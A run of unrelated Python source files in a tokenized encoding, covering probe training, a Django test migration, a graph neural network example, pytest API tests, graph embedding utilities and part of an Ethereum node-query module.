label)<line_sep>epoch_loss[k+"_loss"].append(loss.detach().item())<line_sep>preds=preds.cpu().detach().numpy()<line_sep>preds=np.argmax(preds axis=1)<line_sep>label=label.cpu().detach().numpy()<line_sep>accuracy[k+"_acc"].append(calculate_multiclass_accuracy(preds label))<if_stmt>self.probes[k].training<block_start>loss.backward()<line_sep>optim.step()<block_end><block_end><block_end>epoch_loss={k:np.mean(loss)<for>k,loss epoch_loss.items()}<line_sep>accuracy={k:np.mean(acc)<for>k,acc accuracy.items()}<line_sep><return>epoch_loss accuracy<block_end><def_stmt>do_test_epoch self episodes label_dicts<block_start>sample_label=label_dicts[0][0]<line_sep>accuracy_dict,f1_score_dict={} {}<line_sep>pred_dict,all_label_dict={k:[]<for>k sample_label.keys()} {k:[]<for>k sample_label.keys()}<line_sep># collect all predictions first
data_generator=self.generate_batch(episodes label_dicts)<for_stmt>step,(x labels_batch) enumerate(data_generator)<block_start><for_stmt>k,label labels_batch.items()<block_start>label=torch.tensor(label).long().cpu()<line_sep>all_label_dict[k].append(label)<line_sep>preds=self.probe(x k).detach().cpu()<line_sep>pred_dict[k].append(preds)<block_end><block_end><for_stmt>k all_label_dict.keys()<block_start>preds,labels=torch.cat(pred_dict[k]).cpu().detach().numpy() torch.cat(all_label_dict[k]).cpu().detach().numpy()<line_sep>preds=np.argmax(preds axis=1)<line_sep>accuracy=calculate_multiclass_accuracy(preds labels)<line_sep>f1score=calculate_multiclass_f1_score(preds labels)<line_sep>accuracy_dict[k]=accuracy<line_sep>f1_score_dict[k]=f1score<block_end><return>accuracy_dict f1_score_dict<block_end><def_stmt>train self tr_eps val_eps tr_labels val_labels# if not self.encoder:
# assert len(tr_eps[0][0].squeeze().shape) == 2, "if input is a batch of vectors you must specify an encoder!"
<block_start>sample_label=tr_labels[0][0]<line_sep>self.create_probes(sample_label)<line_sep>e=0<line_sep>all_probes_stopped=np.all([early_stopper.early_stop<for>early_stopper self.early_stoppers.values()])<while_stmt>(<not>all_probes_stopped)<and>e<l>self.epochs<block_start>epoch_loss,accuracy=self.do_one_epoch(tr_eps tr_labels)<line_sep>self.log_results(e epoch_loss accuracy)<line_sep>val_loss,val_accuracy=self.evaluate(val_eps val_labels epoch=e)<line_sep># update all early stoppers
<for_stmt>k sample_label.keys()<block_start><if_stmt><not>self.early_stoppers[k].early_stop<block_start>self.early_stoppers[k](val_accuracy["val_"+k+"_acc"] self.probes[k])<block_end><block_end><for_stmt>k,scheduler self.schedulers.items()<block_start><if_stmt><not>self.early_stoppers[k].early_stop<block_start>scheduler.step(val_accuracy['val_'+k+'_acc'])<block_end><block_end>e<augadd>1<line_sep>all_probes_stopped=np.all([early_stopper.early_stop<for>early_stopper self.early_stoppers.values()])<block_end>print("All probes early stopped!")<block_end><def_stmt>evaluate self val_episodes val_label_dicts epoch=<none><block_start><for_stmt>k,probe self.probes.items()<block_start>probe.eval()<block_end>epoch_loss,accuracy=self.do_one_epoch(val_episodes val_label_dicts)<line_sep>epoch_loss={"val_"+k:v<for>k,v epoch_loss.items()}<line_sep>accuracy={"val_"+k:v<for>k,v accuracy.items()}<line_sep>self.log_results(epoch epoch_loss accuracy)<for_stmt>k,probe self.probes.items()<block_start>probe.train()<block_end><return>epoch_loss accuracy<block_end><def_stmt>test self test_episodes test_label_dicts epoch=<none><block_start><for_stmt>k self.early_stoppers.keys()<block_start>self.early_stoppers[k].early_stop=<false><block_end><for_stmt>k,probe self.probes.items()<block_start>probe.eval()<block_end>acc_dict,f1_dict=self.do_test_epoch(test_episodes test_label_dicts)<line_sep>acc_dict,f1_dict=postprocess_raw_metrics(acc_dict f1_dict)<line_sep>print("""In our paper, we report F1 scores and accuracies averaged across each category.
That is, we take a mean across all state variables in a category to get the average score for that category.
Then we average all the category averages to get the final score that we report per game for each method.
These scores are called \'across_categories_avg_acc\' and \'across_categories_avg_f1\' respectively
We do this to prevent categories with large number of state variables dominating the mean F1 score.
""")<line_sep>self.log_results("Test" acc_dict f1_dict)<line_sep><return>acc_dict f1_dict<block_end><def_stmt>log_results self epoch_idx *dictionaries<block_start>print("Epoch: {}".format(epoch_idx))<for_stmt>dictionary dictionaries<block_start><for_stmt>k,v dictionary.items()<block_start>print("\t {}: {:8.4f}".format(k v))<block_end>print("\t --")<block_end><block_end><block_end><def_stmt>postprocess_raw_metrics acc_dict f1_dict<block_start>acc_overall_avg,f1_overall_avg=compute_dict_average(acc_dict) compute_dict_average(f1_dict)<line_sep>acc_category_avgs_dict,f1_category_avgs_dict=compute_category_avgs(acc_dict) compute_category_avgs(f1_dict)<line_sep>acc_avg_across_categories,f1_avg_across_categories=compute_dict_average(acc_category_avgs_dict) compute_dict_average(f1_category_avgs_dict)<line_sep>acc_dict.update(acc_category_avgs_dict)<line_sep>f1_dict.update(f1_category_avgs_dict)<line_sep>acc_dict["overall_avg"],f1_dict["overall_avg"]=acc_overall_avg f1_overall_avg<line_sep>acc_dict["across_categories_avg"],f1_dict["across_categories_avg"]=[acc_avg_across_categories f1_avg_across_categories]<line_sep>acc_dict=append_suffix(acc_dict "_acc")<line_sep>f1_dict=append_suffix(f1_dict "_f1")<line_sep><return>acc_dict f1_dict<block_end><def_stmt>compute_category_avgs metric_dict<block_start>category_dict={}<for_stmt>category_name,category_keys summary_key_dict.items()<block_start>category_values=[v<for>k,v metric_dict.items()<if>k<in>category_keys]<if_stmt>len(category_values)<l>1<block_start><continue><block_end>category_mean=np.mean(category_values)<line_sep>category_dict[category_name+"_avg"]=category_mean<block_end><return>category_dict<block_end> |
# -*- coding: utf-8 -*-
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db models migrations<import_stmt>modelcluster.fields<import_stmt>django.db.models.deletion<import_stmt>modelcluster.contrib.taggit<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('taggit' '0001_initial') ]<line_sep>operations=[migrations.CreateModel(name='Album' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ('release_date' models.DateField(null=<true> blank=<true>)) ('sort_order' models.IntegerField(null=<true> editable=<false> blank=<true>)) ] options={'ordering':['sort_order'] } ) migrations.CreateModel(name='Band' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] options={'abstract':<false> } ) migrations.CreateModel(name='BandMember' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ('band' modelcluster.fields.ParentalKey(related_name='members' to='tests.Band' on_delete=django.db.models.deletion.CASCADE)) ] ) migrations.CreateModel(name='Chef' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] ) migrations.CreateModel(name='Dish' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] ) migrations.CreateModel(name='Log' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('time' models.DateTimeField(null=<true> blank=<true>)) ('data' models.CharField(max_length=255)) ] options={'abstract':<false> } ) migrations.CreateModel(name='MenuItem' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> 
primary_key=<true>)) ('price' models.DecimalField(max_digits=6 decimal_places=2)) ('dish' models.ForeignKey(related_name='+' to='tests.Dish' on_delete=django.db.models.deletion.CASCADE)) ] ) migrations.CreateModel(name='Place' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] options={'abstract':<false> } ) migrations.CreateModel(name='Review' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('author' models.CharField(max_length=255)) ('body' models.TextField()) ] ) migrations.CreateModel(name='TaggedPlace' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ] options={'abstract':<false> } ) migrations.CreateModel(name='Wine' fields=[('id' models.AutoField(verbose_name='ID' serialize=<false> auto_created=<true> primary_key=<true>)) ('name' models.CharField(max_length=255)) ] ) migrations.CreateModel(name='Restaurant' fields=[('place_ptr' models.OneToOneField(parent_link=<true> auto_created=<true> primary_key=<true> serialize=<false> to='tests.Place' on_delete=django.db.models.deletion.CASCADE)) ('serves_hot_dogs' models.BooleanField(default=<false>)) ('proprietor' models.ForeignKey(related_name='restaurants' on_delete=django.db.models.deletion.SET_NULL blank=<true> to='tests.Chef' null=<true>)) ] options={'abstract':<false> } bases=('tests.place' ) ) migrations.CreateModel(name='Document' fields=[('id' models.AutoField(verbose_name='ID' primary_key=<true> serialize=<false> auto_created=<true>)) ('title' models.CharField(max_length=255)) ('file' models.FileField(upload_to='documents')) ] options={'abstract':<false> } ) migrations.AddField(model_name='taggedplace' name='content_object' field=modelcluster.fields.ParentalKey(related_name='tagged_items' to='tests.Place' on_delete=django.db.models.deletion.CASCADE) ) 
migrations.AddField(model_name='taggedplace' name='tag' field=models.ForeignKey(related_name='tests_taggedplace_items' to='taggit.Tag' on_delete=django.db.models.deletion.CASCADE) ) migrations.AddField(model_name='review' name='place' field=modelcluster.fields.ParentalKey(related_name='reviews' to='tests.Place' on_delete=django.db.models.deletion.CASCADE) ) migrations.AddField(model_name='place' name='tags' field=modelcluster.contrib.taggit.ClusterTaggableManager(to='taggit.Tag' through='tests.TaggedPlace' blank=<true> help_text='A comma-separated list of tags.' verbose_name='Tags') ) migrations.AddField(model_name='menuitem' name='recommended_wine' field=models.ForeignKey(related_name='+' on_delete=django.db.models.deletion.SET_NULL blank=<true> to='tests.Wine' null=<true>) ) migrations.AddField(model_name='album' name='band' field=modelcluster.fields.ParentalKey(related_name='albums' to='tests.Band' on_delete=django.db.models.deletion.CASCADE) ) migrations.AddField(model_name='menuitem' name='restaurant' field=modelcluster.fields.ParentalKey(related_name='menu_items' to='tests.Restaurant' on_delete=django.db.models.deletion.CASCADE) ) ]<block_end> |
<import_stmt>torch<import_from_stmt>torch.nn functional<as>F<import_stmt>pytorch_lightning<as>pl<import_from_stmt>pytorch_lightning.callbacks.early_stopping EarlyStopping<import_from_stmt>torch_geometric_temporal.nn.recurrent DCRNN<import_from_stmt>torch_geometric_temporal.dataset ChickenpoxDatasetLoader<import_from_stmt>torch_geometric_temporal.signal temporal_signal_split<class_stmt>LitDiffConvModel(pl.LightningModule)<block_start><def_stmt>__init__ self node_features filters<block_start>super().__init__()<line_sep>self.recurrent=DCRNN(node_features filters 1)<line_sep>self.linear=torch.nn.Linear(filters 1)<block_end><def_stmt>configure_optimizers self<block_start>optimizer=torch.optim.Adam(self.parameters() lr=1e-2)<line_sep><return>optimizer<block_end><def_stmt>training_step self train_batch batch_idx<block_start>x=train_batch.x<line_sep>y=train_batch.y.view(-1 1)<line_sep>edge_index=train_batch.edge_index<line_sep>h=self.recurrent(x edge_index)<line_sep>h=F.relu(h)<line_sep>h=self.linear(h)<line_sep>loss=F.mse_loss(h y)<line_sep><return>loss<block_end><def_stmt>validation_step self val_batch batch_idx<block_start>x=val_batch.x<line_sep>y=val_batch.y.view(-1 1)<line_sep>edge_index=val_batch.edge_index<line_sep>h=self.recurrent(x edge_index)<line_sep>h=F.relu(h)<line_sep>h=self.linear(h)<line_sep>loss=F.mse_loss(h y)<line_sep>metrics={'val_loss':loss}<line_sep>self.log_dict(metrics)<line_sep><return>metrics<block_end><block_end>loader=ChickenpoxDatasetLoader()<line_sep>dataset_loader=loader.get_dataset(lags=32)<line_sep>train_loader,val_loader=temporal_signal_split(dataset_loader train_ratio=0.2)<line_sep>model=LitDiffConvModel(node_features=32 filters=16)<line_sep>early_stop_callback=EarlyStopping(monitor='val_loss' min_delta=0.00 patience=10 verbose=<false> mode='max')<line_sep>trainer=pl.Trainer(callbacks=[early_stop_callback])<line_sep>trainer.fit(model train_loader val_loader)<line_sep> |
# encoding: utf-8
<import_stmt>pytest<line_sep>@pytest.mark.parametrize('auth_scopes' (<none> ('teams:write' ) ))<def_stmt>test_getting_list_of_teams_by_unauthorized_user_must_fail flask_app_client regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/')<block_end><assert_stmt>response.status_code<eq>401<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'status' 'message'}<block_end>@pytest.mark.parametrize('auth_scopes' (('teams:read' ) ('teams:read' 'teams:write' ) ))<def_stmt>test_getting_list_of_teams_by_authorized_user flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/')<block_end><assert_stmt>response.status_code<eq>200<assert_stmt>'X-Total-Count'<in>response.headers<assert_stmt>int(response.headers['X-Total-Count'])<eq>1<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>isinstance(response.json list)<assert_stmt>set(response.json[0].keys())<ge>{'id' 'title'}<if_stmt>response.json[0]['id']<eq>team_for_regular_user.id<block_start><assert_stmt>response.json[0]['title']<eq>team_for_regular_user.title<block_end><block_end>@pytest.mark.parametrize('auth_scopes' (<none> ('teams:write' ) ))<def_stmt>test_getting_team_info_by_unauthorized_user_must_fail flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>401<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'status' 'message'}<block_end>@pytest.mark.parametrize('auth_scopes' (('teams:read' ) ('teams:read' 'teams:write' ) 
))<def_stmt>test_getting_team_info_by_authorized_user flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>200<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'id' 'title'}<assert_stmt>response.json['id']<eq>team_for_regular_user.id<assert_stmt>response.json['title']<eq>team_for_regular_user.title<block_end>@pytest.mark.parametrize('auth_scopes' (<none> ('teams:write' ) ))<def_stmt>test_getting_list_of_team_members_by_unauthorized_user_must_fail flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d/members/'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>401<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>set(response.json.keys())<ge>{'status' 'message'}<block_end>@pytest.mark.parametrize('auth_scopes' (('teams:read' ) ('teams:read' 'teams:write' ) ))<def_stmt>test_getting_list_of_team_members_by_authorized_user flask_app_client regular_user team_for_regular_user auth_scopes<block_start><with_stmt>flask_app_client.login(regular_user auth_scopes=auth_scopes)<block_start>response=flask_app_client.get('/api/v1/teams/%d/members/'%team_for_regular_user.id)<block_end><assert_stmt>response.status_code<eq>200<assert_stmt>response.content_type<eq>'application/json'<assert_stmt>isinstance(response.json list)<assert_stmt>set(response.json[0].keys())<ge>{'team' 'user' 'is_leader'}<assert_stmt>set(member['team']['id']<for>member response.json)<eq>{team_for_regular_user.id}<assert_stmt>regular_user.id<in>set(member['user']['id']<for>member response.json)<block_end> |
<import_from_stmt>running_modes.configurations.general_configuration_envelope GeneralConfigurationEnvelope<import_from_stmt>running_modes.validation.logging.base_validation_logger BaseValidationLogger<class_stmt>LocalValidationLogger(BaseValidationLogger)<block_start><def_stmt>__init__ self configuration:GeneralConfigurationEnvelope<block_start>super().__init__(configuration)<block_end><def_stmt>log_message self message:str<block_start>self._common_logger.info(message)<block_end><block_end> |
# -*- coding: utf-8 -*-
<import_stmt>copy<import_stmt>itertools<import_stmt>random<import_stmt>networkx<as>nx<import_stmt>numpy<as>np<import_stmt>bionev.OpenNE.graph<as>og<import_stmt>bionev.struc2vec.graph<as>sg<def_stmt>read_for_OpenNE filename weighted=<false><block_start>G=og.Graph()<line_sep>print("Loading training graph for learning embedding...")<line_sep>G.read_edgelist(filename=filename weighted=weighted)<line_sep>print("Graph Loaded...")<line_sep><return>G<block_end><def_stmt>read_for_struc2vec filename<block_start>print("Loading training graph for learning embedding...")<line_sep>G=sg.load_edgelist(filename undirected=<true>)<line_sep>print("Graph Loaded...")<line_sep><return>G<block_end><def_stmt>read_for_gae filename weighted=<false><block_start>print("Loading training graph for learning embedding...")<line_sep>edgelist=np.loadtxt(filename dtype='float')<if_stmt>weighted<block_start>edgelist=[(int(edgelist[idx 0]) int(edgelist[idx 1]))<for>idx range(edgelist.shape[0])<if>edgelist[idx 2]<g>0]<block_end><else_stmt><block_start>edgelist=[(int(edgelist[idx 0]) int(edgelist[idx 1]))<for>idx range(edgelist.shape[0])]<block_end>G=nx.from_edgelist(edgelist)<line_sep>node_list=list(G.nodes)<line_sep>adj=nx.adjacency_matrix(G nodelist=node_list)<line_sep>print("Graph Loaded...")<line_sep><return>(adj node_list)<block_end><def_stmt>read_for_SVD filename weighted=<false><block_start><if_stmt>weighted<block_start>G=nx.read_weighted_edgelist(filename)<block_end><else_stmt><block_start>G=nx.read_edgelist(filename)<block_end><return>G<block_end><def_stmt>split_train_test_graph input_edgelist seed testing_ratio=0.2 weighted=<false><block_start><if_stmt>(weighted)<block_start>G=nx.read_weighted_edgelist(input_edgelist)<block_end><else_stmt><block_start>G=nx.read_edgelist(input_edgelist)<block_end>node_num1,edge_num1=len(G.nodes) len(G.edges)<line_sep>print('Original Graph: nodes:' node_num1 'edges:' 
edge_num1)<line_sep>testing_edges_num=int(len(G.edges)<times>testing_ratio)<line_sep>random.seed(seed)<line_sep>testing_pos_edges=random.sample(G.edges testing_edges_num)<line_sep>G_train=copy.deepcopy(G)<for_stmt>edge testing_pos_edges<block_start>node_u,node_v=edge<if_stmt>(G_train.degree(node_u)<g>1<and>G_train.degree(node_v)<g>1)<block_start>G_train.remove_edge(node_u node_v)<block_end><block_end>G_train.remove_nodes_from(nx.isolates(G_train))<line_sep>node_num2,edge_num2=len(G_train.nodes) len(G_train.edges)<assert_stmt>node_num1<eq>node_num2<line_sep>train_graph_filename='graph_train.edgelist'<if_stmt>weighted<block_start>nx.write_edgelist(G_train train_graph_filename data=['weight'])<block_end><else_stmt><block_start>nx.write_edgelist(G_train train_graph_filename data=<false>)<block_end>node_num1,edge_num1=len(G_train.nodes) len(G_train.edges)<line_sep>print('Training Graph: nodes:' node_num1 'edges:' edge_num1)<line_sep><return>G G_train testing_pos_edges train_graph_filename<block_end><def_stmt>generate_neg_edges original_graph testing_edges_num seed<block_start>L=list(original_graph.nodes())<line_sep># create a complete graph
G=nx.Graph()<line_sep>G.add_nodes_from(L)<line_sep>G.add_edges_from(itertools.combinations(L 2))<line_sep># remove original edges
G.remove_edges_from(original_graph.edges())<line_sep>random.seed(seed)<line_sep>neg_edges=random.sample(G.edges testing_edges_num)<line_sep><return>neg_edges<block_end><def_stmt>load_embedding embedding_file_name node_list=<none><block_start><with_stmt>open(embedding_file_name)<as>f<block_start>node_num,emb_size=f.readline().split()<line_sep>print('Nodes with embedding: %s'%node_num)<line_sep>embedding_look_up={}<if_stmt>node_list<block_start><for_stmt>line f<block_start>vec=line.strip().split()<line_sep>node_id=vec[0]<if_stmt>(node_id<in>node_list)<block_start>emb=[float(x)<for>x vec[1:]]<line_sep>emb=emb/np.linalg.norm(emb)<line_sep>emb[np.isnan(emb)]=0<line_sep>embedding_look_up[node_id]=np.array(emb)<block_end><block_end># if len(node_list) != len(embedding_look_up):
# diff_nodes=set(node_list).difference(set(embedding_look_up.keys()))
# for node in diff_nodes:
# emb = np.random.random((int(emb_size)))
# emb = emb / np.linalg.norm(emb)
# emb[np.isnan(emb)] = 0
# embedding_look_up[node] = np.array(emb)
<assert_stmt>len(node_list)<eq>len(embedding_look_up)<block_end><else_stmt><block_start><for_stmt>line f<block_start>vec=line.strip().split()<line_sep>node_id=vec[0]<line_sep>embeddings=vec[1:]<line_sep>emb=[float(x)<for>x embeddings]<line_sep>emb=emb/np.linalg.norm(emb)<line_sep>emb[np.isnan(emb)]=0<line_sep>embedding_look_up[node_id]=list(emb)<block_end><assert_stmt>int(node_num)<eq>len(embedding_look_up)<block_end>f.close()<line_sep><return>embedding_look_up<block_end><block_end><def_stmt>read_node_labels filename<block_start>fin=open(filename 'r')<line_sep>node_list=[]<line_sep>labels=[]<while_stmt>1<block_start>l=fin.readline()<if_stmt>l<eq>''<block_start><break><block_end>vec=l.strip().split()<line_sep>node_list.append(vec[0])<line_sep>labels.append(vec[1:])<block_end>fin.close()<line_sep>print('Nodes with labels: %s'%len(node_list))<line_sep><return>node_list labels<block_end><def_stmt>split_train_test_classify embedding_look_up X Y seed testing_ratio=0.2<block_start>state=np.random.get_state()<line_sep>training_ratio=1-testing_ratio<line_sep>training_size=int(training_ratio<times>len(X))<line_sep>np.random.seed(seed)<line_sep>shuffle_indices=np.random.permutation(np.arange(len(X)))<line_sep>X_train=[embedding_look_up[X[shuffle_indices[i]]]<for>i range(training_size)]<line_sep>Y_train=[Y[shuffle_indices[i]]<for>i range(training_size)]<line_sep>X_test=[embedding_look_up[X[shuffle_indices[i]]]<for>i range(training_size len(X))]<line_sep>Y_test=[Y[shuffle_indices[i]]<for>i range(training_size len(X))]<line_sep>X_train=np.array(X_train)<line_sep>Y_train=np.array(Y_train)<line_sep>X_test=np.array(X_test)<line_sep>Y_test=np.array(Y_test)<line_sep>np.random.set_state(state)<line_sep><return>X_train Y_train X_test Y_test<block_end><def_stmt>get_y_pred y_test y_pred_prob<block_start>y_pred=np.zeros(y_pred_prob.shape)<line_sep>sort_index=np.flip(np.argsort(y_pred_prob axis=1) 1)<for_stmt>i range(y_test.shape[0])<block_start>num=np.sum(y_test[i])<for_stmt>j 
range(num)<block_start>y_pred[i][sort_index[i][j]]=1<block_end><block_end><return>y_pred<block_end> |
<class_stmt>InternalError(Exception)<block_start><pass><block_end><class_stmt>InvalidAccessError(Exception)<block_start><pass><block_end><class_stmt>InvalidStateError(Exception)<block_start><pass><block_end> |
<import_stmt>json<import_stmt>logging<import_stmt>random<import_from_stmt>typing Any Callable Dict List Literal Optional Sequence Tuple Union overload<import_from_stmt>urllib.parse urlparse<import_stmt>requests<import_from_stmt>ens ENS<import_from_stmt>ens.abis ENS<as>ENS_ABI RESOLVER<as>ENS_RESOLVER_ABI<import_from_stmt>ens.exceptions InvalidName<import_from_stmt>ens.main ENS_MAINNET_ADDR<import_from_stmt>ens.utils address_to_reverse_domain is_none_or_zero_address normal_name_to_hash normalize_name <import_from_stmt>eth_typing BlockNumber HexStr<import_from_stmt>web3 HTTPProvider Web3<import_from_stmt>web3._utils.abi get_abi_output_types<import_from_stmt>web3._utils.contracts find_matching_event_abi<import_from_stmt>web3._utils.filters construct_event_filter_params<import_from_stmt>web3.datastructures MutableAttributeDict<import_from_stmt>web3.exceptions BadFunctionCallOutput BadResponseFormat BlockNotFound TransactionNotFound <import_from_stmt>web3.types BlockIdentifier FilterParams<import_from_stmt>rotkehlchen.chain.constants DEFAULT_EVM_RPC_TIMEOUT<import_from_stmt>rotkehlchen.chain.ethereum.contracts EthereumContract<import_from_stmt>rotkehlchen.chain.ethereum.graph Graph<import_from_stmt>rotkehlchen.chain.ethereum.modules.eth2.constants ETH2_DEPOSIT<import_from_stmt>rotkehlchen.chain.ethereum.types EnsContractParams string_to_ethereum_address<import_from_stmt>rotkehlchen.chain.ethereum.utils multicall multicall_2<import_from_stmt>rotkehlchen.constants.ethereum ERC20TOKEN_ABI ETH_SCAN UNIV1_LP_ABI<import_from_stmt>rotkehlchen.errors.misc BlockchainQueryError InputError RemoteError UnableToDecryptRemoteData <import_from_stmt>rotkehlchen.errors.serialization DeserializationError<import_from_stmt>rotkehlchen.externalapis.etherscan Etherscan<import_from_stmt>rotkehlchen.fval FVal<import_from_stmt>rotkehlchen.greenlets GreenletManager<import_from_stmt>rotkehlchen.logging RotkehlchenLogsAdapter<import_from_stmt>rotkehlchen.serialization.deserialize 
deserialize_ethereum_address deserialize_ethereum_transaction deserialize_int_from_hex <import_from_stmt>rotkehlchen.serialization.serialize process_result<import_from_stmt>rotkehlchen.types ChecksumEthAddress EthereumTransaction EVMTxHash SupportedBlockchain Timestamp <import_from_stmt>rotkehlchen.user_messages MessagesAggregator<import_from_stmt>rotkehlchen.utils.misc from_wei hex_or_bytes_to_str<import_from_stmt>rotkehlchen.utils.network request_get_dict<import_from_stmt>.types NodeName<import_from_stmt>.utils ENS_RESOLVER_ABI_MULTICHAIN_ADDRESS<line_sep>logger=logging.getLogger(__name__)<line_sep>log=RotkehlchenLogsAdapter(logger)<def_stmt>_is_synchronized current_block:int latest_block:int<arrow>Tuple[bool str]<block_start>""" Validate that the ethereum node is synchronized
within 20 blocks of latest block
Returns a tuple (results, message)
- result: Boolean for confirmation of synchronized
- message: A message containing information on what the status is.
"""<line_sep>message=''<if_stmt>current_block<l>(latest_block-20)<block_start>message=(f'Found ethereum node but it is out of sync. {current_block} / '<concat>f'{latest_block}. Will use etherscan.')<line_sep>log.warning(message)<line_sep><return><false> message<block_end><return><true> message<block_end>WEB3_LOGQUERY_BLOCK_RANGE=250000<def_stmt>_query_web3_get_logs web3:Web3 filter_args:FilterParams from_block:int to_block:Union[int Literal['latest']] contract_address:ChecksumEthAddress event_name:str argument_filters:Dict[str Any] <arrow>List[Dict[str Any]]<block_start>until_block=web3.eth.block_number<if>to_block<eq>'latest'<else>to_block<line_sep>events:List[Dict[str Any]]=[]<line_sep>start_block=from_block<line_sep># we know that in most of its early life the Eth2 contract address returns a
# a lot of results. So limit the query range to not hit the infura limits every time
# supress https://lgtm.com/rules/1507386916281/ since it does not apply here
infura_eth2_log_query=('infura.io'<in>web3.manager.provider.endpoint_uri<and># type: ignore # noqa: E501 lgtm [py/incomplete-url-substring-sanitization]
contract_address<eq>ETH2_DEPOSIT.address)<line_sep>block_range=initial_block_range=WEB3_LOGQUERY_BLOCK_RANGE<if_stmt>infura_eth2_log_query<block_start>block_range=initial_block_range=75000<block_end><while_stmt>start_block<le>until_block<block_start>filter_args['fromBlock']=start_block<line_sep>end_block=min(start_block+block_range until_block)<line_sep>filter_args['toBlock']=end_block<line_sep>log.debug('Querying web3 node for contract event' contract_address=contract_address event_name=event_name argument_filters=argument_filters from_block=filter_args['fromBlock'] to_block=filter_args['toBlock'] )<line_sep># As seen in https://github.com/rotki/rotki/issues/1787, the json RPC, if it
# is infura can throw an error here which we can only parse by catching the exception
<try_stmt><block_start>new_events_web3:List[Dict[str Any]]=[dict(x)<for>x web3.eth.get_logs(filter_args)]# noqa: E501
<block_end><except_stmt>(ValueError KeyError)<as>e<block_start><if_stmt>isinstance(e ValueError)<block_start><try_stmt><block_start>decoded_error=json.loads(str(e).replace("'" '"'))<block_end><except_stmt>json.JSONDecodeError# reraise the value error if the error is not json
<block_start><raise>e<from><none><block_end>msg=decoded_error.get('message' '')<block_end><else_stmt># temporary hack for key error seen from pokt
<block_start>msg='query returned more than 10000 results'<block_end># errors from: https://infura.io/docs/ethereum/json-rpc/eth-getLogs
<if_stmt>msg<in>('query returned more than 10000 results' 'query timeout exceeded')<block_start>block_range=block_range<floordiv>2<if_stmt>block_range<l>50<block_start><raise># stop retrying if block range gets too small
<block_end># repeat the query with smaller block range
<continue><block_end># else, well we tried .. reraise the error
<raise>e<block_end># Turn all HexBytes into hex strings
<for_stmt>e_idx,event enumerate(new_events_web3)<block_start>new_events_web3[e_idx]['blockHash']=event['blockHash'].hex()<line_sep>new_topics=[]<for_stmt>topic event['topics']<block_start>new_topics.append(topic.hex())<block_end>new_events_web3[e_idx]['topics']=new_topics<line_sep>new_events_web3[e_idx]['transactionHash']=event['transactionHash'].hex()<block_end>start_block=end_block+1<line_sep>events.extend(new_events_web3)<line_sep># end of the loop, end of 1 query. Reset the block range to max
block_range=initial_block_range<block_end><return>events<block_end><def_stmt>_prepare_ens_call_arguments addr:ChecksumEthAddress<arrow>List[Any]<block_start><try_stmt><block_start>reversed_domain=address_to_reverse_domain(addr)<block_end><except_stmt>(TypeError ValueError)<as>e<block_start><raise>InputError(f'Address {addr} has incorrect format or type. {str(e)}')<from>e<block_end>normalized_domain_name=normalize_name(reversed_domain)<line_sep>arguments=[normal_name_to_hash(normalized_domain_name)]<line_sep><return>arguments<block_end><def_stmt>_encode_ens_contract params:EnsContractParams<arrow>str<block_start>contract=EthereumContract(address=params.address abi=params.abi deployed_block=0)<line_sep><return>contract.encode(method_name=params.method_name arguments=params.arguments)<block_end><def_stmt>_decode_ens_contract params:EnsContractParams result_encoded:Any<arrow>ChecksumEthAddress<block_start>contract=EthereumContract(address=params.address abi=params.abi deployed_block=0)<line_sep>result=contract.decode(# pylint: disable=E1136
result=result_encoded method_name=params.method_name arguments=params.arguments )[0]<line_sep><return>string_to_ethereum_address(result)<block_end># TODO: Ideally all these should become configurable
# Taking LINKPOOL out since it's just really too slow and seems to not
# respond to the batched calls almost at all. Combined with web3.py retries
# this makes the tokens balance queries super slow.
OPEN_NODES=(NodeName.MYCRYPTO NodeName.BLOCKSCOUT NodeName.AVADO_POOL NodeName.ONEINCH NodeName.MYETHERWALLET # NodeName.LINKPOOL,
